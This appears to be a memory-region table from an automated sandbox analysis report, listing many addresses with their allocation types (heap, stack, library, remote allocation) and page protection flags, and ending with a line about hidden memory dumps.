|
heap
|
page read and write
|
||
|
21B76760000
|
heap
|
page read and write
|
||
|
11E73BA0000
|
heap
|
page readonly
|
||
|
11187964000
|
trusted library allocation
|
page read and write
|
||
|
21B766C0000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F3A8000
|
heap
|
page read and write
|
||
|
11182302000
|
heap
|
page read and write
|
||
|
7FF9F1CB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1C50000
|
trusted library allocation
|
page read and write
|
||
|
21B5C680000
|
trusted library allocation
|
page read and write
|
||
|
21B76730000
|
trusted library allocation
|
page read and write
|
||
|
11183790000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD91000
|
heap
|
page read and write
|
||
|
21B5E3A0000
|
heap
|
page execute and read and write
|
||
|
1FD1F393000
|
heap
|
page read and write
|
||
|
24B5D256000
|
heap
|
page read and write
|
||
|
24B5E202000
|
heap
|
page read and write
|
||
|
21B769A0000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD6D000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DDB5000
|
heap
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
D002D78000
|
stack
|
page read and write
|
||
|
24B5DD91000
|
heap
|
page read and write
|
||
|
21B5C547000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
11E73A80000
|
heap
|
page read and write
|
||
|
21B5F23B000
|
trusted library allocation
|
page read and write
|
||
|
21B6E453000
|
trusted library allocation
|
page read and write
|
||
|
D003ACD000
|
stack
|
page read and write
|
||
|
209C623C000
|
heap
|
page read and write
|
||
|
24B5E200000
|
heap
|
page read and write
|
||
|
D003B8E000
|
stack
|
page read and write
|
||
|
11E73950000
|
heap
|
page read and write
|
||
|
20298E00000
|
heap
|
page read and write
|
||
|
24B5DD70000
|
heap
|
page read and write
|
||
|
24B5D2A9000
|
heap
|
page read and write
|
||
|
B25000
|
heap
|
page read and write
|
||
|
7FF9F1C40000
|
trusted library allocation
|
page read and write
|
||
|
F44FDC000
|
stack
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DA90000
|
remote allocation
|
page read and write
|
||
|
9E8000
|
heap
|
page read and write
|
||
|
21B5F4CA000
|
trusted library allocation
|
page read and write
|
||
|
21B5C2F0000
|
heap
|
page read and write
|
||
|
111837A0000
|
trusted library allocation
|
page read and write
|
||
|
111822A1000
|
heap
|
page read and write
|
||
|
24B5DDBE000
|
heap
|
page read and write
|
||
|
20298E5B000
|
heap
|
page read and write
|
||
|
11187940000
|
trusted library allocation
|
page read and write
|
||
|
21B6E3F1000
|
trusted library allocation
|
page read and write
|
||
|
209C624F000
|
heap
|
page read and write
|
||
|
20298F13000
|
heap
|
page read and write
|
||
|
1650205C000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
16502029000
|
heap
|
page read and write
|
||
|
C00000
|
heap
|
page read and write
|
||
|
24B5DDB5000
|
heap
|
page read and write
|
||
|
20298C30000
|
heap
|
page read and write
|
||
|
1FD1F393000
|
heap
|
page read and write
|
||
|
2592EE63000
|
heap
|
page read and write
|
||
|
24B5DD71000
|
heap
|
page read and write
|
||
|
24B5D313000
|
heap
|
page read and write
|
||
|
D0028FF000
|
stack
|
page read and write
|
||
|
2B00000
|
remote allocation
|
page read and write
|
||
|
24B5DD8C000
|
heap
|
page read and write
|
||
|
7FF9F1C60000
|
trusted library allocation
|
page read and write
|
||
|
21B5C480000
|
heap
|
page read and write
|
||
|
1FD1F386000
|
heap
|
page read and write
|
||
|
20298E13000
|
heap
|
page read and write
|
||
|
11187CDA000
|
heap
|
page read and write
|
||
|
D002CF7000
|
stack
|
page read and write
|
||
|
2592EE6D000
|
heap
|
page read and write
|
||
|
24B5DD91000
|
heap
|
page read and write
|
||
|
AF2BFAB000
|
stack
|
page read and write
|
||
|
24B5DD67000
|
heap
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
F453FC000
|
stack
|
page read and write
|
||
|
77C48FE000
|
stack
|
page read and write
|
||
|
77C413F000
|
stack
|
page read and write
|
||
|
24B5DDC2000
|
heap
|
page read and write
|
||
|
24B5DDB3000
|
heap
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
1FD1F393000
|
heap
|
page read and write
|
||
|
21B76571000
|
trusted library allocation
|
page read and write
|
||
|
21B76520000
|
trusted library allocation
|
page read and write
|
||
|
2592EF00000
|
heap
|
page read and write
|
||
|
72BE47E000
|
stack
|
page read and write
|
||
|
11183793000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD88000
|
heap
|
page read and write
|
||
|
21B76590000
|
trusted library allocation
|
page read and write
|
||
|
209C6259000
|
heap
|
page read and write
|
||
|
24B5DDA2000
|
heap
|
page read and write
|
||
|
F454F9000
|
stack
|
page read and write
|
||
|
11187CF2000
|
heap
|
page read and write
|
||
|
11182140000
|
heap
|
page read and write
|
||
|
A72000
|
heap
|
page read and write
|
||
|
24B5DD8C000
|
heap
|
page read and write
|
||
|
24B5DD78000
|
heap
|
page read and write
|
||
|
21B769B0000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD71000
|
heap
|
page read and write
|
||
|
24B5D2F1000
|
heap
|
page read and write
|
||
|
D002A7D000
|
stack
|
page read and write
|
||
|
24B5D2C2000
|
heap
|
page read and write
|
||
|
24B5DD8D000
|
heap
|
page read and write
|
||
|
8F8000
|
heap
|
page read and write
|
||
|
244E000
|
stack
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
24B5D2C8000
|
heap
|
page read and write
|
||
|
111822AA000
|
heap
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
21B7649D000
|
heap
|
page read and write
|
||
|
2592EE58000
|
heap
|
page read and write
|
||
|
24B5DD6F000
|
heap
|
page read and write
|
||
|
209C6030000
|
heap
|
page read and write
|
||
|
21B5C53C000
|
heap
|
page read and write
|
||
|
21B5C600000
|
heap
|
page readonly
|
||
|
21B5C509000
|
heap
|
page read and write
|
||
|
A24000
|
heap
|
page read and write
|
||
|
D002E7F000
|
stack
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
11187CFB000
|
heap
|
page read and write
|
||
|
24B5DD67000
|
heap
|
page read and write
|
||
|
11E73AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1B61000
|
trusted library allocation
|
page read and write
|
||
|
11187820000
|
trusted library allocation
|
page read and write
|
||
|
11187A90000
|
trusted library allocation
|
page read and write
|
||
|
24B5D2B3000
|
heap
|
page read and write
|
||
|
11182289000
|
heap
|
page read and write
|
||
|
21B766C0000
|
trusted library allocation
|
page read and write
|
||
|
11187CAC000
|
heap
|
page read and write
|
||
|
21B6E400000
|
trusted library allocation
|
page read and write
|
||
|
24B5E218000
|
heap
|
page read and write
|
||
|
290F000
|
stack
|
page read and write
|
||
|
A4E000
|
heap
|
page read and write
|
||
|
24B5DD85000
|
heap
|
page read and write
|
||
|
111821D0000
|
trusted library allocation
|
page read and write
|
||
|
21B767AA000
|
heap
|
page read and write
|
||
|
20298E54000
|
heap
|
page read and write
|
||
|
11E748D0000
|
trusted library allocation
|
page read and write
|
||
|
AAB000
|
heap
|
page read and write
|
||
|
24B5DD6D000
|
heap
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
21B76577000
|
trusted library allocation
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F2B0000
|
heap
|
page read and write
|
||
|
24B5DD85000
|
heap
|
page read and write
|
||
|
21B76590000
|
trusted library allocation
|
page read and write
|
||
|
D0039CE000
|
stack
|
page read and write
|
||
|
24B5D229000
|
heap
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1BE0000
|
trusted library allocation
|
page read and write
|
||
|
11182271000
|
heap
|
page read and write
|
||
|
1FD1F38E000
|
heap
|
page read and write
|
||
|
7FF9F19C0000
|
trusted library allocation
|
page read and write
|
||
|
24B5D213000
|
heap
|
page read and write
|
||
|
21B5C720000
|
heap
|
page read and write
|
||
|
22F0000
|
direct allocation
|
page execute and read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD85000
|
heap
|
page read and write
|
||
|
7FFA51CC2000
|
unkown
|
page readonly
|
||
|
876000
|
stack
|
page read and write
|
||
|
11187A60000
|
trusted library allocation
|
page read and write
|
||
|
D002F7D000
|
stack
|
page read and write
|
||
|
D002DF9000
|
stack
|
page read and write
|
||
|
1FD1F384000
|
heap
|
page read and write
|
||
|
2ABE000
|
stack
|
page read and write
|
||
|
11187970000
|
trusted library allocation
|
page read and write
|
||
|
D003C0F000
|
stack
|
page read and write
|
||
|
21B5F091000
|
trusted library allocation
|
page read and write
|
||
|
21B766B0000
|
trusted library allocation
|
page read and write
|
||
|
8BA000
|
stack
|
page read and write
|
||
|
24B5DD70000
|
heap
|
page read and write
|
||
|
7FF9F1D00000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F38E000
|
heap
|
page read and write
|
||
|
21B76540000
|
trusted library allocation
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
860897E000
|
stack
|
page read and write
|
||
|
24B5E202000
|
heap
|
page read and write
|
||
|
209C6229000
|
heap
|
page read and write
|
||
|
21B76AA0000
|
heap
|
page read and write
|
||
|
21B5E3D0000
|
trusted library allocation
|
page read and write
|
||
|
18002D000
|
direct allocation
|
page read and write
|
||
|
21B5F232000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
D003A4E000
|
stack
|
page read and write
|
||
|
21B764A5000
|
heap
|
page read and write
|
||
|
7FF9F1D20000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F19BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
21B766D0000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD8F000
|
heap
|
page read and write
|
||
|
999FAF000
|
stack
|
page read and write
|
||
|
24B5D24F000
|
heap
|
page read and write
|
||
|
21B76571000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD85000
|
heap
|
page read and write
|
||
|
8E0000
|
remote allocation
|
page read and write
|
||
|
21B5F080000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F376000
|
heap
|
page read and write
|
||
|
24B5E202000
|
heap
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
24B5D160000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1B6C000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F280000
|
heap
|
page read and write
|
||
|
24B5DD67000
|
heap
|
page read and write
|
||
|
11187C00000
|
heap
|
page read and write
|
||
|
1FD1F360000
|
heap
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
18002C000
|
direct allocation
|
page readonly
|
||
|
11187980000
|
trusted library allocation
|
page read and write
|
||
|
99A27F000
|
stack
|
page read and write
|
||
|
21B76578000
|
trusted library allocation
|
page read and write
|
||
|
BBE000
|
stack
|
page read and write
|
||
|
21B76540000
|
trusted library allocation
|
page read and write
|
||
|
24B5DDB7000
|
heap
|
page read and write
|
||
|
21B76531000
|
trusted library allocation
|
page read and write
|
||
|
962000
|
heap
|
page read and write
|
||
|
C25000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
16502100000
|
heap
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1BD0000
|
trusted library allocation
|
page read and write
|
||
|
16501EE0000
|
heap
|
page read and write
|
||
|
24B5DD98000
|
heap
|
page read and write
|
||
|
2B00000
|
remote allocation
|
page read and write
|
||
|
11E73BC9000
|
heap
|
page read and write
|
||
|
21B5F57E000
|
trusted library allocation
|
page read and write
|
||
|
11E739E8000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B764CD000
|
heap
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1BB0000
|
trusted library allocation
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
A72000
|
heap
|
page read and write
|
||
|
21B767D2000
|
heap
|
page read and write
|
||
|
72BE1FB000
|
stack
|
page read and write
|
||
|
21B76590000
|
trusted library allocation
|
page read and write
|
||
|
77C41BF000
|
stack
|
page read and write
|
||
|
24B5DD6D000
|
heap
|
page read and write
|
||
|
24B5D2EE000
|
heap
|
page read and write
|
||
|
A72000
|
heap
|
page read and write
|
||
|
5F0000
|
remote allocation
|
page read and write
|
||
|
209C6130000
|
trusted library allocation
|
page read and write
|
||
|
956000
|
heap
|
page read and write
|
||
|
21B763F8000
|
heap
|
page read and write
|
||
|
11187A10000
|
trusted library allocation
|
page read and write
|
||
|
209C5FC0000
|
heap
|
page read and write
|
||
|
77C40BB000
|
stack
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD33000
|
heap
|
page read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
24B5D302000
|
heap
|
page read and write
|
||
|
AC0000
|
direct allocation
|
page execute and read and write
|
||
|
24B5D254000
|
heap
|
page read and write
|
||
|
24B5DD67000
|
heap
|
page read and write
|
||
|
24B5E21A000
|
heap
|
page read and write
|
||
|
24B5DDB6000
|
heap
|
page read and write
|
||
|
24B5DDB0000
|
heap
|
page read and write
|
||
|
2592F802000
|
trusted library allocation
|
page read and write
|
||
|
24B5DDAF000
|
heap
|
page read and write
|
||
|
24B5DD10000
|
heap
|
page read and write
|
||
|
7FFA51CCB000
|
unkown
|
page read and write
|
||
|
280C000
|
stack
|
page read and write
|
||
|
209C6258000
|
heap
|
page read and write
|
||
|
2592F690000
|
trusted library allocation
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
16502064000
|
heap
|
page read and write
|
||
|
21B5C5B3000
|
heap
|
page read and write
|
||
|
24B5DC02000
|
heap
|
page read and write
|
||
|
21B766B0000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD68000
|
heap
|
page read and write
|
||
|
99A2F9000
|
stack
|
page read and write
|
||
|
18002D000
|
direct allocation
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
999F2A000
|
stack
|
page read and write
|
||
|
AF2C9FF000
|
unkown
|
page read and write
|
||
|
7FFA51CCB000
|
unkown
|
page read and write
|
||
|
21B5C500000
|
heap
|
page read and write
|
||
|
11187C11000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD95000
|
heap
|
page read and write
|
||
|
1FD1F39D000
|
heap
|
page read and write
|
||
|
21B766F7000
|
trusted library allocation
|
page read and write
|
||
|
21B5F2E4000
|
trusted library allocation
|
page read and write
|
||
|
D002FFB000
|
stack
|
page read and write
|
||
|
2592EE76000
|
heap
|
page read and write
|
||
|
24B5DDB3000
|
heap
|
page read and write
|
||
|
21B764C2000
|
heap
|
page read and write
|
||
|
24B5DD91000
|
heap
|
page read and write
|
||
|
24B5E202000
|
heap
|
page read and write
|
||
|
21B764D7000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD6D000
|
heap
|
page read and write
|
||
|
7FF9F1C20000
|
trusted library allocation
|
page read and write
|
||
|
20298E61000
|
heap
|
page read and write
|
||
|
7FF9F1C90000
|
trusted library allocation
|
page read and write
|
||
|
11E73980000
|
heap
|
page read and write
|
||
|
11187AA0000
|
remote allocation
|
page read and write
|
||
|
24B5DD85000
|
heap
|
page read and write
|
||
|
7FF9F1BA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CEB5FF000
|
stack
|
page read and write
|
||
|
21B767CD000
|
heap
|
page read and write
|
||
|
21B76540000
|
trusted library allocation
|
page read and write
|
||
|
1118794E000
|
trusted library allocation
|
page read and write
|
||
|
24B5DDB3000
|
heap
|
page read and write
|
||
|
1118228E000
|
heap
|
page read and write
|
||
|
288E000
|
stack
|
page read and write
|
||
|
21B5C4D5000
|
heap
|
page read and write
|
||
|
21B5C583000
|
heap
|
page read and write
|
||
|
11182273000
|
heap
|
page read and write
|
||
|
209C6200000
|
heap
|
page read and write
|
||
|
2592ED90000
|
heap
|
page read and write
|
||
|
24B5DD67000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
11187CF6000
|
heap
|
page read and write
|
||
|
24B5DD8D000
|
heap
|
page read and write
|
||
|
5F0000
|
remote allocation
|
page read and write
|
||
|
1118226C000
|
heap
|
page read and write
|
||
|
72BE9FF000
|
stack
|
page read and write
|
||
|
CEB07F000
|
stack
|
page read and write
|
||
|
B20000
|
heap
|
page read and write
|
||
|
21B767D0000
|
heap
|
page read and write
|
||
|
7FF9F1D50000
|
trusted library allocation
|
page read and write
|
||
|
AAD000
|
heap
|
page read and write
|
||
|
1FD1F38E000
|
heap
|
page read and write
|
||
|
21B5F0BB000
|
trusted library allocation
|
page read and write
|
||
|
11187830000
|
trusted library allocation
|
page read and write
|
||
|
21B76540000
|
trusted library allocation
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B5C725000
|
heap
|
page read and write
|
||
|
11183410000
|
trusted library section
|
page readonly
|
||
|
1FD1F130000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
A31000
|
heap
|
page read and write
|
||
|
11182D13000
|
heap
|
page read and write
|
||
|
21B5F008000
|
trusted library allocation
|
page read and write
|
||
|
21B76531000
|
trusted library allocation
|
page read and write
|
||
|
21B76450000
|
heap
|
page read and write
|
||
|
21B766D0000
|
trusted library allocation
|
page read and write
|
||
|
933000
|
heap
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
CEB27F000
|
stack
|
page read and write
|
||
|
11182D59000
|
heap
|
page read and write
|
||
|
11187CA0000
|
heap
|
page read and write
|
||
|
21B5F04B000
|
trusted library allocation
|
page read and write
|
||
|
CEAE7B000
|
stack
|
page read and write
|
||
|
6302FFF000
|
stack
|
page read and write
|
||
|
24B5DD85000
|
heap
|
page read and write
|
||
|
21B5E600000
|
trusted library allocation
|
page read and write
|
||
|
630297E000
|
stack
|
page read and write
|
||
|
2320000
|
heap
|
page read and write
|
||
|
24B5D2E5000
|
heap
|
page read and write
|
||
|
24B5DD67000
|
heap
|
page read and write
|
||
|
21B76540000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
1118229A000
|
heap
|
page read and write
|
||
|
77C46F7000
|
stack
|
page read and write
|
||
|
77C45FB000
|
stack
|
page read and write
|
||
|
630287B000
|
stack
|
page read and write
|
||
|
21B767B0000
|
heap
|
page read and write
|
||
|
291E000
|
stack
|
page read and write
|
||
|
1FD1F3A4000
|
heap
|
page read and write
|
||
|
7FF9F19CC000
|
trusted library allocation
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
27A0000
|
trusted library allocation
|
page read and write
|
||
|
21B764CD000
|
heap
|
page read and write
|
||
|
11187CE1000
|
heap
|
page read and write
|
||
|
11187C54000
|
heap
|
page read and write
|
||
|
72BE6FB000
|
stack
|
page read and write
|
||
|
952000
|
heap
|
page read and write
|
||
|
D002B7E000
|
stack
|
page read and write
|
||
|
8E0000
|
remote allocation
|
page read and write
|
||
|
21B5C4F0000
|
trusted library allocation
|
page read and write
|
||
|
99A379000
|
stack
|
page read and write
|
||
|
24B5DDA2000
|
heap
|
page read and write
|
||
|
AF2C877000
|
stack
|
page read and write
|
||
|
289C000
|
stack
|
page read and write
|
||
|
21B7679E000
|
heap
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
21B76550000
|
trusted library allocation
|
page read and write
|
||
|
7FFA51CCF000
|
unkown
|
page readonly
|
||
|
2B00000
|
remote allocation
|
page read and write
|
||
|
111877A0000
|
trusted library allocation
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
24B5D250000
|
heap
|
page read and write
|
||
|
16502013000
|
heap
|
page read and write
|
||
|
7FF9F1B92000
|
trusted library allocation
|
page read and write
|
||
|
24B5D23C000
|
heap
|
page read and write
|
||
|
21B5F4C2000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1BC0000
|
trusted library allocation
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
A4E000
|
heap
|
page read and write
|
||
|
11187948000
|
trusted library allocation
|
page read and write
|
||
|
21B766B0000
|
trusted library allocation
|
page read and write
|
||
|
72BE5FC000
|
stack
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
11187CF8000
|
heap
|
page read and write
|
||
|
6302A7C000
|
stack
|
page read and write
|
||
|
11182D18000
|
heap
|
page read and write
|
||
|
20298E5E000
|
heap
|
page read and write
|
||
|
D002EFE000
|
stack
|
page read and write
|
||
|
21B5C6A0000
|
heap
|
page read and write
|
||
|
11187984000
|
trusted library allocation
|
page read and write
|
||
|
CEB2FE000
|
stack
|
page read and write
|
||
|
2B7F000
|
stack
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
21B767C5000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
CEAFFE000
|
stack
|
page read and write
|
||
|
8608B7E000
|
stack
|
page read and write
|
||
|
63028FE000
|
stack
|
page read and write
|
||
|
24B5DD85000
|
heap
|
page read and write
|
||
|
20298F00000
|
heap
|
page read and write
|
||
|
16502059000
|
heap
|
page read and write
|
||
|
24B5DD8C000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1CE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFA51CCF000
|
unkown
|
page readonly
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
20299602000
|
trusted library allocation
|
page read and write
|
||
|
1FD1F2B5000
|
heap
|
page read and write
|
||
|
7FF9F1CC0000
|
trusted library allocation
|
page read and write
|
||
|
21B5F053000
|
trusted library allocation
|
page read and write
|
||
|
2592EE02000
|
heap
|
page read and write
|
||
|
21B5C450000
|
heap
|
page read and write
|
||
|
111833F0000
|
trusted library section
|
page readonly
|
||
|
21B5C585000
|
heap
|
page read and write
|
||
|
21B5C610000
|
trusted library allocation
|
page read and write
|
||
|
21B76578000
|
trusted library allocation
|
page read and write
|
||
|
24B5DDBA000
|
heap
|
page read and write
|
||
|
1FD1F376000
|
heap
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
21B764C2000
|
heap
|
page read and write
|
||
|
21B76590000
|
trusted library allocation
|
page read and write
|
||
|
16501E70000
|
heap
|
page read and write
|
||
|
24B5D24D000
|
heap
|
page read and write
|
||
|
21B76590000
|
trusted library allocation
|
page read and write
|
||
|
11182C02000
|
heap
|
page read and write
|
||
|
20298E29000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
11E73AF0000
|
trusted library allocation
|
page read and write
|
||
|
21B76530000
|
trusted library allocation
|
page read and write
|
||
|
16502000000
|
heap
|
page read and write
|
||
|
24B5DD71000
|
heap
|
page read and write
|
||
|
99A47C000
|
stack
|
page read and write
|
||
|
16502108000
|
heap
|
page read and write
|
||
|
11187940000
|
trusted library allocation
|
page read and write
|
||
|
11182200000
|
heap
|
page read and write
|
||
|
11E739CF000
|
heap
|
page read and write
|
||
|
11E73810000
|
heap
|
page read and write
|
||
|
24B5DD88000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD54000
|
heap
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
AAD000
|
heap
|
page read and write
|
||
|
209C6280000
|
heap
|
page read and write
|
||
|
24B5DDD9000
|
heap
|
page read and write
|
||
|
1118223D000
|
heap
|
page read and write
|
||
|
99A3FE000
|
stack
|
page read and write
|
||
|
21B76591000
|
trusted library allocation
|
page read and write
|
||
|
21B5F0D6000
|
trusted library allocation
|
page read and write
|
||
|
21B767BE000
|
heap
|
page read and write
|
||
|
24B5DD14000
|
heap
|
page read and write
|
||
|
21B76750000
|
heap
|
page read and write
|
||
|
111822F8000
|
heap
|
page read and write
|
||
|
21B5EFE8000
|
trusted library allocation
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
24B5E221000
|
heap
|
page read and write
|
||
|
7FF9F1BF0000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD8C000
|
heap
|
page read and write
|
||
|
1650203C000
|
heap
|
page read and write
|
||
|
CEB3F9000
|
stack
|
page read and write
|
||
|
21B766E0000
|
trusted library allocation
|
page read and write
|
||
|
20298E5D000
|
heap
|
page read and write
|
||
|
24B5D316000
|
heap
|
page read and write
|
||
|
21B765A7000
|
heap
|
page execute and read and write
|
||
|
2A1E000
|
stack
|
page read and write
|
||
|
11182213000
|
heap
|
page read and write
|
||
|
16502802000
|
trusted library allocation
|
page read and write
|
||
|
18002C000
|
direct allocation
|
page readonly
|
||
|
7FF9F1C30000
|
trusted library allocation
|
page read and write
|
||
|
21B766C0000
|
trusted library allocation
|
page read and write
|
||
|
111833E0000
|
trusted library section
|
page readonly
|
||
|
6302EFE000
|
stack
|
page read and write
|
||
|
21B5E216000
|
heap
|
page read and write
|
||
|
111821E0000
|
trusted library section
|
page read and write
|
||
|
F45379000
|
stack
|
page read and write
|
||
|
7FF9F1C70000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD6B000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
21B766D0000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD00000
|
heap
|
page read and write
|
||
|
AF2C579000
|
stack
|
page read and write
|
||
|
24B5E202000
|
heap
|
page read and write
|
||
|
21B76571000
|
trusted library allocation
|
page read and write
|
||
|
24B5D2AE000
|
heap
|
page read and write
|
||
|
20298E3C000
|
heap
|
page read and write
|
||
|
11182229000
|
heap
|
page read and write
|
||
|
21B76740000
|
trusted library allocation
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1B56000
|
trusted library allocation
|
page read and write
|
||
|
21B76710000
|
trusted library allocation
|
page read and write
|
||
|
21B76560000
|
trusted library allocation
|
page read and write
|
||
|
24B5D270000
|
heap
|
page read and write
|
||
|
21B767C6000
|
heap
|
page read and write
|
||
|
24B5DD12000
|
heap
|
page read and write
|
||
|
21B76570000
|
trusted library allocation
|
page read and write
|
||
|
18002E000
|
direct allocation
|
page readonly
|
||
|
11E739CF000
|
heap
|
page read and write
|
||
|
21B5C640000
|
trusted library allocation
|
page read and write
|
||
|
D00297F000
|
stack
|
page read and write
|
||
|
21B5E3D4000
|
trusted library allocation
|
page read and write
|
||
|
2592EF02000
|
heap
|
page read and write
|
||
|
209C6291000
|
heap
|
page read and write
|
||
|
21B76590000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
D0029FE000
|
stack
|
page read and write
|
||
|
7FFA51CA0000
|
unkown
|
page readonly
|
||
|
21B5E3F1000
|
trusted library allocation
|
page read and write
|
||
|
209C6253000
|
heap
|
page read and write
|
||
|
21B76580000
|
trusted library allocation
|
page read and write
|
||
|
24B5DA90000
|
remote allocation
|
page read and write
|
||
|
21B5F255000
|
trusted library allocation
|
page read and write
|
||
|
21B766B0000
|
trusted library allocation
|
page read and write
|
||
|
21B76700000
|
trusted library allocation
|
page read and write
|
||
|
11182276000
|
heap
|
page read and write
|
||
|
11187AA0000
|
remote allocation
|
page read and write
|
||
|
7FF9F19B0000
|
trusted library allocation
|
page read and write
|
||
|
24B5DD67000
|
heap
|
page read and write
|
||
|
11E73BB0000
|
trusted library allocation
|
page read and write
|
||
|
77C47FF000
|
stack
|
page read and write
|
||
|
16502002000
|
heap
|
page read and write
|
||
|
24B5DDD3000
|
heap
|
page read and write
|
||
|
7FF9F1C00000
|
trusted library allocation
|
page read and write
|
There are 850 hidden memdumps, click here to show them.